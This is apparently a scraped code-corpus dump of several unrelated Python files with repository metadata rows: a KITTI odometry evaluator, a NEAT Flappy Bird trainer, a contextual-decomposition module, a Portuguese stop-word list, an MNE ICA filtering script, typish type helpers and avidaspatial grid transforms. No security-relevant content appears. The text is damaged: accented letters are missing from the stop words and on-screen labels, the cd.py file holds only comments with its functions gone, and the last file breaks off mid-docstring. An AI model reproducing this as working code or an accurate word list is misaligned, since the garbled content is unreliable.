] | 10 | 2020-01-02T09:42:45.000Z | 2021-11-19T11:53:05.000Z | eval_odom.py | nikola3794/kitti-odom-eval | c808874dc18db3b60b8c711e55546f09af553659 | [
"MIT"
] | 22 | 2019-11-18T07:40:18.000Z | 2022-02-20T12:31:29.000Z | # Copyright (C) Huangying Zhan 2019. All rights reserved.
import argparse
from kitti_odometry import KittiEvalOdom
parser = argparse.ArgumentParser(description='KITTI evaluation')
parser.add_argument('--result', type=str, required=True,
help="Result directory")
parser.add_argument('--align', type=str,
choices=['scale', 'scale_7dof', '7dof', '6dof'],
default=None,
help="alignment type")
parser.add_argument('--seqs',
nargs="+",
type=int,
help="sequences to be evaluated",
default=None)
args = parser.parse_args()
eval_tool = KittiEvalOdom()
gt_dir = "dataset/kitti_odom/gt_poses/"
result_dir = args.result
continue_flag = input("Evaluate result in {}? [y/n]".format(result_dir))
if continue_flag == "y":
eval_tool.eval(
gt_dir,
result_dir,
alignment=args.align,
seqs=args.seqs,
)
else:
print("Double check the path!")
| 29.6 | 72 | 0.59556 |
7749a97981a9d33396783bf41834fff772524e60 | 9,115 | py | Python | flappy_bird.py | wandreuscv/IA_learn_flappy_bird | 46491f6336aba04af241b78edfd288f59d4b0aec | [
"MIT"
] | null | null | null | flappy_bird.py | wandreuscv/IA_learn_flappy_bird | 46491f6336aba04af241b78edfd288f59d4b0aec | [
"MIT"
] | null | null | null | flappy_bird.py | wandreuscv/IA_learn_flappy_bird | 46491f6336aba04af241b78edfd288f59d4b0aec | [
"MIT"
] | null | null | null | import pygame
import random
import os
import time
import neat
import visualize
import pickle
import bcolors as b
pygame.font.init()
SCORE_MAX = [0, 0, 0]
WIN_WIDTH = 600
WIN_HEIGHT = 800
FLOOR = 730
STAT_FONT = pygame.font.SysFont("comicsans", 50)
END_FONT = pygame.font.SysFont("comicsans", 70)
DRAW_LINES = False
WIN = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
pygame.display.set_caption("IA LEARNS Flappy Bird")
pipe_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","pipe.png")).convert_alpha())
bg_img = pygame.transform.scale(pygame.image.load(os.path.join("imgs","bg.png")).convert_alpha(), (600, 900))
bird_images = [pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","bird" + str(x) + ".png"))) for x in range(1,4)]
base_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","base.png")).convert_alpha())
gen = 0
def blitRotateCenter(surf, image, topleft, angle):
rotated_image = pygame.transform.rotate(image, angle)
new_rect = rotated_image.get_rect(center = image.get_rect(topleft = topleft).center)
surf.blit(rotated_image, new_rect.topleft)
def draw_window(win, birds, pipes, base, score, gen, pipe_ind):
if gen == 0:
gen = 1
win.blit(bg_img, (0,0))
for pipe in pipes:
pipe.draw(win)
base.draw(win)
for bird in birds:
if DRAW_LINES:
try:
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_TOP.get_width()/2, pipes[pipe_ind].height), 5)
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_BOTTOM.get_width()/2, pipes[pipe_ind].bottom), 5)
except:
pass
bird.draw(win)
score_label = STAT_FONT.render("Pontuao: " + str(score),1,(255,255,255))
win.blit(score_label, (WIN_WIDTH - score_label.get_width() - 15, 10))
score_label = STAT_FONT.render("Gerao: " + str(gen-1),1,(255,255,255))
win.blit(score_label, (10, 10))
score_label = STAT_FONT.render("Restantes: " + str(len(birds)),1,(255,255,255))
win.blit(score_label, (10, 50))
pygame.display.update()
def eval_genomes(genomes, config):
global WIN, gen
win = WIN
gen += 1
nets = []
birds = []
ge = []
for genome_id, genome in genomes:
genome.fitness = 0
net = neat.nn.FeedForwardNetwork.create(genome, config)
nets.append(net)
birds.append(Bird(230,350))
ge.append(genome)
base = Base(FLOOR)
pipes = [Pipe(700)]
score = 0
clock = pygame.time.Clock()
run = True
while run and len(birds) > 0:
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.quit()
quit()
break
pipe_ind = 0
if len(birds) > 0:
if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():
pipe_ind = 1
for x, bird in enumerate(birds):
ge[x].fitness += 0.1
bird.move()
output = nets[birds.index(bird)].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))
if output[0] > 0.5:
bird.jump()
base.move()
rem = []
add_pipe = False
for pipe in pipes:
pipe.move()
for bird in birds:
if pipe.collide(bird, win):
ge[birds.index(bird)].fitness -= 1
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
if pipe.x + pipe.PIPE_TOP.get_width() < 0:
rem.append(pipe)
if not pipe.passed and pipe.x < bird.x:
pipe.passed = True
add_pipe = True
if add_pipe:
score += 1
for genome in ge:
genome.fitness += 5
pipes.append(Pipe(WIN_WIDTH))
for r in rem:
pipes.remove(r)
for bird in birds:
if bird.y + bird.img.get_height() - 10 >= FLOOR or bird.y < -50:
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
draw_window(WIN, birds, pipes, base, score, gen, pipe_ind)
if score > SCORE_MAX[0]:
SCORE_MAX[0] = score
SCORE_MAX[1] = gen - 1
SCORE_MAX[2] = genome.fitness
print(b.HELP, 'ACTUAL SCORE:', score, 'from generation:', gen, 'with fitness:', genome.fitness, b.END)
print(b.OKMSG, 'MAX SCORE FOR NOW:', SCORE_MAX[0], b.END, b.ERRMSG, 'by generation:', SCORE_MAX[1], b.END, b.BLUE, 'with fitness:', SCORE_MAX[2], b.END)
def run(config_file):
    """Load the NEAT configuration, evolve for up to 50 generations and
    print the best genome found."""
    neat_config = neat.config.Config(
        neat.DefaultGenome,
        neat.DefaultReproduction,
        neat.DefaultSpeciesSet,
        neat.DefaultStagnation,
        config_file,
    )
    population = neat.Population(neat_config)
    # Report progress on stdout, plus collect per-generation statistics.
    population.add_reporter(neat.StdOutReporter(True))
    statistics = neat.StatisticsReporter()
    population.add_reporter(statistics)
    winner = population.run(eval_genomes, 50)
    print('\nMelhor Genoma:\n{!s}'.format(winner))
if __name__ == '__main__':
    # Resolve the NEAT config file relative to this script so the run does
    # not depend on the current working directory.
    local_dir = os.path.dirname(__file__)
    config_path = os.path.join(local_dir, 'config-neat-flappybird.txt')
    run(config_path)
| 28.844937 | 207 | 0.576961 |
774a3cbe3570598a07718acd612708e7b85dbeed | 34,273 | py | Python | src/cd.py | laura-rieger/deep-explanation-penalization | ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f | [
"MIT"
] | 105 | 2019-10-01T19:00:35.000Z | 2022-03-25T14:03:32.000Z | src/cd.py | laura-rieger/deep-explanation-penalization | ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f | [
"MIT"
] | 11 | 2020-01-13T15:49:13.000Z | 2021-12-28T11:36:21.000Z | src/cd.py | laura-rieger/deep-explanation-penalization | ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f | [
"MIT"
] | 16 | 2019-12-22T20:53:33.000Z | 2022-03-15T14:17:50.000Z |
#original from https://github.com/csinva/hierarchical-dnn-interpretations/blob/master/acd/scores/cd.py
import torch
import torch.nn.functional as F
from copy import deepcopy
from torch import sigmoid
from torch import tanh
import numpy as np
stabilizing_constant = 10e-20
# propagate tanh nonlinearity
# propagate convolutional or linear layer
# propagate ReLu nonlinearity
# propagate maxpooling operation
# propagate dropout operation
# get contextual decomposition scores for blob
# batch of [start, stop) with unigrams working
# def cd_penalty_annotated(batch, model1, start, stop, scores):
# # get index where annotation present:
# idx_nonzero = (start != -1).nonzero()[:,0]
# model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0]
# correct_idx = (batch.label[ idx_nonzero], torch.arange(batch.label[ idx_nonzero].shape[0]) )
# model_softmax = torch.nn.functional.softmax(model_output, dim =0)[correct_idx]
# output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() -(torch.log(model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #next thing to try
# print(output, torch.log(model_softmax).mean())
# return output
# def cd_penalty_annotated(batch, model1, start, stop, agrees):
# model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
# correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
# model1_softmax = softmax_out((model1_output[0][0],model1_output[0][1]))[correct_idx]
# output = -(torch.log(model1_softmax) * agrees.float()).mean() #+ (torch.log(model1_softmax) * (1-agrees).float()).mean()
# return output
# this implementation of cd is very long so that we can view CD at intermediate layers
# in reality, this should be a loop which uses the above functions
| 49.599132 | 190 | 0.664663 |
774b06809a445d82f24ad6693ec8a85d76b2e232 | 2,554 | py | Python | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 12 | 2019-03-20T20:43:47.000Z | 2020-04-13T11:10:52.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 13 | 2018-06-05T11:54:40.000Z | 2019-07-02T11:33:14.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 2 | 2020-02-15T18:33:35.000Z | 2022-02-13T14:11:41.000Z | # coding: utf8
from __future__ import unicode_literals
STOP_WORDS = set(
"""
s rea acerca ademais adeus agora ainda algo algumas alguns ali alm ambas ambos antes
ao aos apenas apoia apoio apontar aps aquela aquelas aquele aqueles aqui aquilo
as assim atravs atrs at a
baixo bastante bem boa bom breve
cada caminho catorze cedo cento certamente certeza cima cinco coisa com como
comprida comprido conhecida conhecido conselho contra contudo corrente cuja
cujo custa c
da daquela daquele dar das de debaixo demais dentro depois des desde dessa desse
desta deste deve devem dever dez dezanove dezasseis dezassete dezoito diante
direita disso diz dizem dizer do dois dos doze duas d do
s ela elas ele eles em embora enquanto entre ento era essa essas esse esses esta
estado estar estar estas estava este estes esteve estive estivemos estiveram
estiveste estivestes estou est ests esto eu eventual exemplo
falta far favor faz fazeis fazem fazemos fazer fazes fazia fao fez fim final
foi fomos for fora foram forma foste fostes fui
geral grande grandes grupo
inclusive iniciar inicio ir ir isso isto
j
lado lhe ligado local logo longe lugar l
maior maioria maiorias mais mal mas me meio menor menos meses mesmo meu meus mil
minha minhas momento muito muitos mximo ms
na nada naquela naquele nas nem nenhuma nessa nesse nesta neste no nos nossa
nossas nosso nossos nova novas nove novo novos num numa nunca nuns no nvel ns
nmero nmeros
obrigada obrigado oitava oitavo oito onde ontem onze ora os ou outra outras outros
para parece parte partir pegar pela pelas pelo pelos perto pode podem poder poder
podia pois ponto pontos por porquanto porque porqu portanto porm posio
possivelmente posso possvel pouca pouco povo primeira primeiro prprio prxima
prximo puderam pde pe pem
quais qual qualquer quando quanto quarta quarto quatro que quem quer querem quero
questo quieta quieto quinta quinto quinze qu
relao
sabe saber se segunda segundo sei seis sem sempre ser seria sete seu seus sexta
sexto sim sistema sob sobre sois somente somos sou sua suas so stima stimo s
tais tal talvez tambm tanta tanto tarde te tem temos tempo tendes tenho tens
tentar tentaram tente tentei ter terceira terceiro teu teus teve tipo tive
tivemos tiveram tiveste tivestes toda todas todo todos treze trs tu tua tuas
tudo to tm
um uma umas uns usa usar ltimo
vai vais valor veja vem vens ver vez vezes vinda vindo vinte voc vocs vos vossa
vossas vosso vossos vrios vo vm vs
zero
""".split()
)
| 35.971831 | 89 | 0.817541 |
774b9166abe0ad0a7b9b9dd1b88e0f21b94c408a | 13,906 | py | Python | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 10 | 2015-06-13T17:27:18.000Z | 2021-02-14T13:03:11.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 2 | 2020-07-11T18:34:57.000Z | 2021-03-07T02:27:46.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 1 | 2016-03-23T22:26:23.000Z | 2016-03-23T22:26:23.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'miaschiev.ui'
#
# Created: Wed Aug 06 17:13:17 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
| 64.082949 | 151 | 0.718898 |
774bad54e921796a93026ea0248ace9747a3f917 | 1,673 | py | Python | layers/db/db/tests/test_db.py | NASA-IMPACT/hls-sentinel2-downloader-serverless | e3e4f542fc805c6259f20a6dd932c98cccd4144c | [
"Apache-2.0"
] | null | null | null | layers/db/db/tests/test_db.py | NASA-IMPACT/hls-sentinel2-downloader-serverless | e3e4f542fc805c6259f20a6dd932c98cccd4144c | [
"Apache-2.0"
] | 2 | 2021-07-23T00:49:42.000Z | 2021-07-23T00:51:25.000Z | layers/db/db/tests/test_db.py | NASA-IMPACT/hls-sentinel2-downloader-serverless | e3e4f542fc805c6259f20a6dd932c98cccd4144c | [
"Apache-2.0"
] | null | null | null | import os
import pytest
from assertpy import assert_that
from ..models.granule import Granule
from ..models.granule_count import GranuleCount
from ..models.status import Status
from ..session import _get_url, get_session, get_session_maker
| 35.595745 | 71 | 0.780036 |
774d4b0cb7fee10f0f0fa488de8d167fefa2fbd2 | 1,478 | py | Python | dexp/processing/utils/_test/test_normalise.py | haesleinhuepf/dexp | 2ea84f3db323724588fac565fae56f0d522bc5ca | [
"BSD-3-Clause"
] | 16 | 2021-04-21T14:09:19.000Z | 2022-03-22T02:30:59.000Z | dexp/processing/utils/_test/test_normalise.py | haesleinhuepf/dexp | 2ea84f3db323724588fac565fae56f0d522bc5ca | [
"BSD-3-Clause"
] | 28 | 2021-04-15T17:43:08.000Z | 2022-03-29T16:08:35.000Z | dexp/processing/utils/_test/test_normalise.py | haesleinhuepf/dexp | 2ea84f3db323724588fac565fae56f0d522bc5ca | [
"BSD-3-Clause"
] | 3 | 2022-02-08T17:41:30.000Z | 2022-03-18T15:32:27.000Z | import numpy as np
import pytest
from arbol import aprint
from dexp.processing.utils.normalise import Normalise
from dexp.utils.backends import Backend
from dexp.utils.testing.testing import execute_both_backends
| 34.372093 | 106 | 0.725981 |
774ee32b7bd61777145b97c33929e59c467687c5 | 64 | py | Python | pyCameras/__init__.py | imr-luh/pyCameras | 30fc220022b0562f5244d9fd5f436b8630abe4cd | [
"MIT"
] | 2 | 2019-05-10T08:43:38.000Z | 2019-05-17T16:00:13.000Z | pyCameras/__init__.py | imr-luh/pyCameras | 30fc220022b0562f5244d9fd5f436b8630abe4cd | [
"MIT"
] | null | null | null | pyCameras/__init__.py | imr-luh/pyCameras | 30fc220022b0562f5244d9fd5f436b8630abe4cd | [
"MIT"
] | 2 | 2020-03-10T17:15:08.000Z | 2020-04-24T09:02:21.000Z | __version__ = '0.0.1'
from . import utils
from .utils import *
| 12.8 | 21 | 0.6875 |
774f04287f666d1e053a72b91ac8437dc815a95d | 427 | py | Python | sdfspu/sdf_net.py | soundmaking/sdfspu | 164af2602d07b18c45a8182cd5e9638628c7e165 | [
"MIT"
] | null | null | null | sdfspu/sdf_net.py | soundmaking/sdfspu | 164af2602d07b18c45a8182cd5e9638628c7e165 | [
"MIT"
] | null | null | null | sdfspu/sdf_net.py | soundmaking/sdfspu | 164af2602d07b18c45a8182cd5e9638628c7e165 | [
"MIT"
] | null | null | null | import socket
if __name__ == "__main__":
print('IP via get_ip():\t', get_ip())
| 21.35 | 56 | 0.58548 |
775087ff0c58dbd29b82c1af2c4f5dcf0ce17d5d | 844 | py | Python | pysparkling/sql/expressions/literals.py | ptallada/pysparkling | f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78 | [
"Apache-2.0"
] | 260 | 2015-05-11T18:08:44.000Z | 2022-01-15T13:19:43.000Z | pysparkling/sql/expressions/literals.py | ptallada/pysparkling | f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78 | [
"Apache-2.0"
] | 79 | 2015-06-02T09:53:25.000Z | 2021-09-26T11:18:18.000Z | pysparkling/sql/expressions/literals.py | ptallada/pysparkling | f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78 | [
"Apache-2.0"
] | 50 | 2015-06-06T17:00:58.000Z | 2022-01-15T13:19:18.000Z | from ..utils import AnalysisException
from .expressions import Expression
__all__ = ["Literal"]
| 25.575758 | 84 | 0.582938 |
7750af67ab2df68b6c19d4aa9f6c7f583c889749 | 3,812 | py | Python | filter_ICA.py | MadsJensen/RP_scripts | b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf | [
"BSD-3-Clause"
] | null | null | null | filter_ICA.py | MadsJensen/RP_scripts | b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf | [
"BSD-3-Clause"
] | null | null | null | filter_ICA.py | MadsJensen/RP_scripts | b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 8 14:45:02 2014.
@author: mje
"""
import mne
import sys
from mne.io import Raw
from mne.preprocessing import ICA, create_eog_epochs, create_ecg_epochs
import matplotlib
matplotlib.use('Agg')
from my_settings import *
# Subject identifier is passed on the command line.
subject = sys.argv[1]
# SETTINGS
n_jobs = 1
l_freq, h_freq = 1, 95  # High and low frequency setting for the band pass
n_freq = 50  # notch filter frequency
decim = 4  # decim value
# For each experimental condition: load the maxfiltered raw file, notch and
# high-pass filter it, fit ICA, reject EOG/ECG components, save the result.
for condition in conditions:
    raw = Raw(mf_autobad_off_folder + "%s_%s_mc_tsss-raw.fif" %
              (subject, condition),
              preload=True)
    raw.drop_channels(raw.info["bads"])
    raw.notch_filter(n_freq, n_jobs=n_jobs)
    # NOTE(review): h_freq is defined above but never used -- this call is a
    # high-pass only, not the 1-95 Hz band pass the comment suggests. Confirm.
    raw.filter(l_freq, None, n_jobs=n_jobs)
    raw.save(
        mf_autobad_off_folder + "%s_%s_filtered_mc_tsss-raw.fif" %
        (subject, condition),
        overwrite=True)
    # ICA Part
    ica = ICA(n_components=0.99, method='fastica', max_iter=512)
    picks = mne.pick_types(
        raw.info,
        meg=True,
        eeg=False,
        eog=False,
        emg=False,
        stim=False,
        exclude='bads')
    ica.fit(raw, picks=picks, decim=decim, reject=reject_params)
    # maximum number of components to reject
    n_max_eog = 1
    n_max_ecg = 3
    ##########################################################################
    # 2) identify bad components by analyzing latent sources.
    # DETECT EOG BY CORRELATION
    # HORIZONTAL EOG
    title = "ICA: %s for %s"
    eog_epochs = create_eog_epochs(raw, ch_name="EOG002")  # TODO: check EOG
    eog_average = eog_epochs.average()
    # channel name
    eog_inds, scores = ica.find_bads_eog(raw)
    eog_inds = eog_inds[:n_max_eog]
    ica.exclude += eog_inds
    # Save diagnostic plots only when at least one EOG component was found.
    if eog_inds:
        fig = ica.plot_scores(
            scores, exclude=eog_inds, title=title % ('eog', subject))
        fig.savefig(ica_folder + "plots/%s_%s_eog_scores_2.png" % (subject,
                                                                   condition))
        fig = ica.plot_sources(eog_average, exclude=eog_inds)
        fig.savefig(ica_folder + "plots/%s_%s_eog_source_2.png" % (subject,
                                                                   condition))
        fig = ica.plot_components(
            eog_inds, title=title % ('eog', subject), colorbar=True)
        fig.savefig(ica_folder + "plots/%s_%s_eog_component_2.png" % (
            subject, condition))
        fig = ica.plot_overlay(eog_average, exclude=eog_inds, show=False)
        fig.savefig(ica_folder + "plots/%s_%s_eog_excluded_2.png" % (
            subject, condition))
        del eog_epochs, eog_average
    # ECG
    ecg_epochs = create_ecg_epochs(raw, tmin=-.5, tmax=.5)
    ecg_inds, scores = ica.find_bads_ecg(ecg_epochs)
    ecg_inds = ecg_inds[:n_max_ecg]
    ica.exclude.extend(ecg_inds)
    if ecg_inds:
        fig = ica.plot_components(
            ecg_inds, title=title % ('ecg', subject), colorbar=True)
        fig.savefig(ica_folder + "plots/%s_%s_ecg_component_2.png" % (
            subject, condition))
        fig = ica.plot_overlay(raw, exclude=ecg_inds, show=False)
        fig.savefig(ica_folder + "plots/%s_%s_ecg_excluded_2.png" % (
            subject, condition))
        fig = ica.plot_properties(raw, picks=ecg_inds)
        fig[0].savefig(ica_folder + "plots/%s_%s_plot_properties_2.png" % (
            subject, condition))
    ##########################################################################
    # Apply the solution to Raw, Epochs or Evoked like this:
    raw_ica = ica.apply(raw)
    ica.save(ica_folder + "%s_%s-ica_2.fif" % (subject, condition))  # save ICA
    # componenets
    # Save raw with ICA removed
    raw_ica.save(
        ica_folder + "%s_%s_ica-raw.fif" % (subject, condition),
        overwrite=True)
77526fa74a8b3626dd46cca703ea3aecf100938a | 428 | py | Python | typish/_types.py | georgeharker/typish | 1c043beb74d89e62b10339a2a964f60ec175adfa | [
"MIT"
] | 16 | 2019-08-03T13:57:17.000Z | 2021-11-08T11:51:52.000Z | typish/_types.py | georgeharker/typish | 1c043beb74d89e62b10339a2a964f60ec175adfa | [
"MIT"
] | 27 | 2019-09-11T13:24:38.000Z | 2022-02-11T07:04:12.000Z | typish/_types.py | georgeharker/typish | 1c043beb74d89e62b10339a2a964f60ec175adfa | [
"MIT"
] | 7 | 2019-11-18T16:50:09.000Z | 2021-11-01T14:34:39.000Z | """
PRIVATE MODULE: do not import (from) it directly.
This module contains types that are not available by default.
"""
import typing
from inspect import Parameter
T = typing.TypeVar('T')
KT = typing.TypeVar('KT')
VT = typing.TypeVar('VT')
Empty = Parameter.empty
Unknown = type('Unknown', (Empty, ), {})
Module = type(typing)
NoneType = type(None)
Ellipsis_ = type(...) # Use EllipsisType instead.
EllipsisType = type(...)
| 22.526316 | 61 | 0.703271 |
7752a70c09c370c66d0c734d9856294edf75f0f4 | 11,172 | py | Python | avidaspatial/transform_data.py | emilydolson/avida-spatial-tools | 7beb0166ccefad5fa722215b030ac2a53d62b59e | [
"MIT"
] | 1 | 2018-06-12T18:31:40.000Z | 2018-06-12T18:31:40.000Z | avidaspatial/transform_data.py | emilydolson/avida-spatial-tools | 7beb0166ccefad5fa722215b030ac2a53d62b59e | [
"MIT"
] | 1 | 2016-02-03T23:37:09.000Z | 2016-02-03T23:37:09.000Z | avidaspatial/transform_data.py | emilydolson/avida-spatial-tools | 7beb0166ccefad5fa722215b030ac2a53d62b59e | [
"MIT"
] | null | null | null | from .utils import *
from scipy.spatial.distance import pdist
import scipy.cluster.hierarchy as hierarchicalcluster
def rank_environment_and_phenotypes(environment, phenotypes, k=15):
    """Cluster an environment and a phenotype grid with one shared ranking.

    Converts the EnvironmentFile's resource sets into phenotype format,
    builds a single ranking over the union of niches and phenotypes (at most
    ``k`` clusters), then maps both grids through it so that the same color
    can later be used for corresponding niches and phenotypes.

    Returns a tuple of (ranked environment grid, ranked phenotype grid,
    total number of clusters).
    """
    env_as_phenotypes = convert_world_to_phenotype(environment)
    shared_ranks = get_ranks_for_environment_and_phenotypes(env_as_phenotypes,
                                                            phenotypes)
    ranked_env, n = assign_ranks_by_cluster(env_as_phenotypes, k, shared_ranks)
    ranked_phenotypes, n = assign_ranks_by_cluster(phenotypes, k, shared_ranks)
    return ranked_env, ranked_phenotypes, n
def do_clustering(types, max_clust):
    """Group binary-number strings into at most ``max_clust`` clusters.

    Uses complete-linkage hierarchical clustering over a weighted hamming
    distance between the digit sequences of the numbers.

    Returns a dict mapping cluster id -> list of the input strings that
    belong to that cluster.
    """
    # Strip everything up to and including the "b" prefix and split each
    # number into a list of digit characters, zero-padded to equal length so
    # the hamming distance is well-defined.
    digit_lists = [list(t[t.find("b") + 1:]) for t in types]
    prepend_zeros_to_lists(digit_lists)

    distances = pdist(digit_lists, weighted_hamming)
    linkage = hierarchicalcluster.complete(distances)
    labels = hierarchicalcluster.fcluster(linkage, max_clust,
                                          criterion="maxclust")

    # Group the original strings by their assigned cluster label.
    members = {label: [] for label in set(labels)}
    for label, type_str in zip(labels, types):
        members[label].append(type_str)
    return members
def rank_clusters(cluster_dict):
    """Assign each cluster a unique integer rank.

    Takes a dict mapping cluster id -> list of binary-number strings and
    returns a dict mapping cluster id -> rank, where ranks run from
    ``len(cluster_dict)`` down to 1 in order of increasing "average" member
    value, giving every cluster its own position in the ordering.
    """
    # Score each cluster by the numeric value of its "average" member.
    scores = {key: eval(string_avg(members, binary=True))
              for key, members in cluster_dict.items()}
    # Hand out ranks n..1, walking the clusters from lowest to highest score.
    rank = len(scores)
    for key in sorted(scores, key=scores.get):
        scores[key] = rank
        rank -= 1
    return scores
def get_ranks_for_environment_and_phenotypes(environment, phenotypes, k=15):
    """Build one rank lookup covering both an environment and phenotypes.

    ``environment`` is expected to already be in phenotype (binary string)
    format. Flattens both grids, clusters the union of their values into at
    most ``k`` groups, and returns a dict mapping each binary string to the
    rank of its cluster.
    """
    all_types = set(flatten_array(phenotypes) + flatten_array(environment))
    # The empty/null sentinels get fixed ranks below, so keep them out of
    # the clustering itself.
    all_types -= {"-0b1", "0b0"}
    ranks = generate_ranks(list(all_types), k)
    ranks["-0b1"] = -1  # the empty phenotype/niche is always rank -1
    ranks["0b0"] = 0    # the null phenotype/niche is always rank 0
    return ranks
def assign_ranks_by_cluster(grid, n, ranks=None):
    """Replace every value in ``grid`` with the rank of its cluster.

    ``n`` caps the number of clusters used when ``ranks`` has to be
    generated; a precomputed ``ranks`` dict may be supplied instead.

    Returns a tuple of (grid of ranks, number of distinct ranks).
    """
    rank_lookup = generate_ranks(grid, n) if ranks is None else ranks
    return assign_ranks_to_grid(grid, rank_lookup), len(rank_lookup)
def generate_ranks(grid, n):
    """Return a dict mapping each distinct binary string in ``grid`` to the
    rank of its cluster, using at most ``n`` clusters.

    ``grid`` may be a flat list or a 2d grid; a 2d grid is flattened first.
    """
    values = deepcopy(grid)
    if type(values) is list and type(values[0]) is list:
        values = flatten_array(values)
    unique_types = list(frozenset(values))
    # With fewer distinct types than n, every type gets its own rank;
    # otherwise cluster them down to at most n groups first.
    if len(unique_types) < n:
        return rank_types(unique_types)
    return cluster_types(unique_types, n)
def assign_ranks_to_grid(grid, ranks):
    """Map every binary string in a 2d (or 2d-of-lists) grid through ``ranks``.

    Returns a new grid of the same shape where each string has been replaced
    by its rank. Note: the empty/null sentinels are written into ``ranks``
    in place, matching the historical behaviour callers rely on.
    """
    result = deepcopy(grid)
    ranks["0b0"] = 0
    ranks["-0b1"] = -1
    for row, grid_row in enumerate(grid):
        for col, cell in enumerate(grid_row):
            if type(cell) is list:
                for depth, value in enumerate(cell):
                    result[row][col][depth] = ranks[value]
            else:
                result[row][col] = ranks[cell]
    return result
def cluster_types(types, max_clust=12):
    """Map each binary string in ``types`` to an integer cluster rank.

    Hierarchical clustering groups the strings into at most ``max_clust``
    clusters; every string then receives the rank of the cluster it belongs
    to.
    """
    max_clust = min(max_clust, len(types))
    members_by_cluster = do_clustering(types, max_clust)
    rank_by_cluster = rank_clusters(members_by_cluster)
    # Flatten: every binary number inherits the rank of its cluster.
    return {type_str: rank_by_cluster[cluster]
            for cluster, members in members_by_cluster.items()
            for type_str in members}
def rank_types(types):
    """Map each binary-number string in ``types`` to its rank in the list.

    Ranks order the strings by numeric value. When '0b0' is absent, ranks
    start at 1 instead of 0 (reserving 0 for the null type). Strings with
    equal numeric value share the rank of the first occurrence, as with
    ``list.index``.

    This is the better alternative to cluster_types for the happy case where
    there are few enough types to give each its own color.
    """
    include_null = '0b0' in types
    offset = 0 if include_null else 1
    # Parse with int(t, 2) instead of eval() and build the position lookup
    # once, replacing the original eval + repeated list.index (O(n^2)).
    ordered_values = sorted(int(t, 2) for t in types)
    first_index = {}
    for i, value in enumerate(ordered_values):
        first_index.setdefault(value, i)  # keep first occurrence, like .index
    return {t: first_index[int(t, 2)] + offset for t in types}
def make_count_grid(data):
    """Replace each binary-number string with the number of ones it contains.

    Takes a 3d grid (or a 3d grid whose cells are lists, i.e. 4d) of strings
    representing binary numbers and returns a grid of the same dimensions
    where every string has been replaced by its count of '1' digits. An
    entry whose ``count`` call fails falls back to the entry's length.
    """
    data = deepcopy(data)
    for i in range(len(data)):
        for j in range(len(data[i])):
            for k in range(len(data[i][j])):
                if type(data[i][j][k]) is list:
                    for l in range(len(data[i][j][k])):
                        try:
                            # Original assigned to data[i][j][k], clobbering
                            # the list with a scalar and crashing for lists
                            # of length > 1; write element-wise instead.
                            data[i][j][k][l] = data[i][j][k][l].count("1")
                        except Exception:  # was a bare except
                            data[i][j][k][l] = len(data[i][j][k][l])
                else:
                    try:
                        data[i][j][k] = data[i][j][k].count("1")
                    except Exception:  # was a bare except
                        data[i][j][k] = len(data[i][j][k])
    return data
def make_optimal_phenotype_grid(environment, phenotypes):
    """Distance of each phenotype from the optimum for its location.

    For every cell, each phenotype is converted to the set of tasks it
    performs (via the EnvironmentFile's task list) and compared against the
    resources in that cell; the result grid holds the size of the symmetric
    difference, i.e. how far the phenotype is from the local optimum. The
    environment file must therefore list all tasks, in the right order.
    """
    n_cols, n_rows = environment.size
    distances = deepcopy(phenotypes)
    for row in range(n_rows):
        for col in range(n_cols):
            for idx in range(len(distances[row][col])):
                res_set = phenotype_to_res_set(distances[row][col][idx],
                                               environment.tasks)
                mismatch = environment[row][col].symmetric_difference(res_set)
                distances[row][col][idx] = len(mismatch)
    return distances
def task_percentages(data, n_tasks=9):
    """Per-cell fraction of organisms performing each task.

    ``data`` is an m x n x d grid of '0b...'-style strings (one per file /
